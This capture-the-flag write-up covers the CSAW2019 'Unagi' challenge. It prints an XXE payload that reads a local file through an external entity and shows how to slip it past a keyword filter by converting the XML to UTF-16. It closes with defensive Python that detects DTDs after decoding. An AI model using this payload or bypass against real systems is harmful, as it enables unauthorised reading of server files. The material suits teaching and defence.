[Web_Unagi] xxe injection filter bypass
The challenge prompts us to upload a file and tells us that the flag is in the root directory.
The upload file format is:
<users>
<user>
<username>alice</username>
<password>passwd1</password>
<name>Alice</name>
<email>[email protected]</email>
<group>CSAW2019</group>
</user>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>[email protected]</email>
<group>CSAW2019</group>
</user>
</users>
This is an obvious candidate for XXE injection:
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>gg</username>
<password>passwd1</password>
<name>ggg</name>
<email>[email protected]</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
After uploading it, however, we find that the payload is filtered, so we need a way to bypass the filter.
Since XML files may be encoded in UTF-16, we can convert the file to UTF-16:
iconv -f UTF-8 -t UTF-16 1.xml > flag.xml
Then upload again:
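Seen from the defender's side, the re-encoding works against any filter that matches ASCII keywords in the raw bytes while the parser decodes UTF-16. The Python below is an added example, not code from the challenge or this writeup: `naive_filter_blocks` is an assumed shape for the upload filter, `safe_filter_blocks` decodes the upload first and rejects any DTD, and both samples are constructed.

```python
import codecs

# UTF-32 BOMs are tested first: the UTF-32-LE BOM begins with the UTF-16-LE BOM.
BOMS = [(codecs.BOM_UTF32_LE, "utf-32"), (codecs.BOM_UTF32_BE, "utf-32"),
        (codecs.BOM_UTF8, "utf-8-sig"),
        (codecs.BOM_UTF16_LE, "utf-16"), (codecs.BOM_UTF16_BE, "utf-16")]

def naive_filter_blocks(raw: bytes) -> bool:
    """Assumed shape of the upload filter: ASCII keyword match on raw bytes."""
    return any(tok in raw for tok in (b"ENTITY", b"SYSTEM", b"file:"))

def decode_xml(raw: bytes) -> str:
    """Decode the way an XML parser autodetects: BOM, then BOM-less UTF-16, else UTF-8."""
    for bom, codec in BOMS:
        if raw.startswith(bom):
            return raw.decode(codec)
    if raw[:4] == b"<\x00?\x00":
        return raw.decode("utf-16-le")
    if raw[:4] == b"\x00<\x00?":
        return raw.decode("utf-16-be")
    return raw.decode("utf-8")

def safe_filter_blocks(raw: bytes) -> bool:
    """Reject uploads that carry a DTD, checked on decoded text rather than raw bytes."""
    try:
        text = decode_xml(raw)
    except UnicodeDecodeError:
        return True   # undecodable input is rejected, not passed to the parser
    if "\x00" in text:
        return True   # NULs mean the encoding guess was wrong
    return "<!DOCTYPE" in text  # entities can only be declared inside a DTD

# Constructed samples modelled on the page's upload format.
BENIGN = "<?xml version='1.0'?><users><user><username>alice</username></user></users>"
WITH_DTD = ("<?xml version='1.0'?><!DOCTYPE users [<!ENTITY xxe SYSTEM \"file:///flag\">]>"
            "<users><user><intro>&xxe;</intro></user></users>")

def verdicts(doc: str) -> dict:
    """Run both filters over the UTF-8 and UTF-16 encodings of one document."""
    return {enc: (naive_filter_blocks(doc.encode(enc)), safe_filter_blocks(doc.encode(enc)))
            for enc in ("utf-8", "utf-16")}

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("with DTD", WITH_DTD)):
        print(name, verdicts(doc))
```

A pre-parse check like this is only a second layer; the durable fix is to configure the XML parser so that it does not load DTDs or resolve external entities.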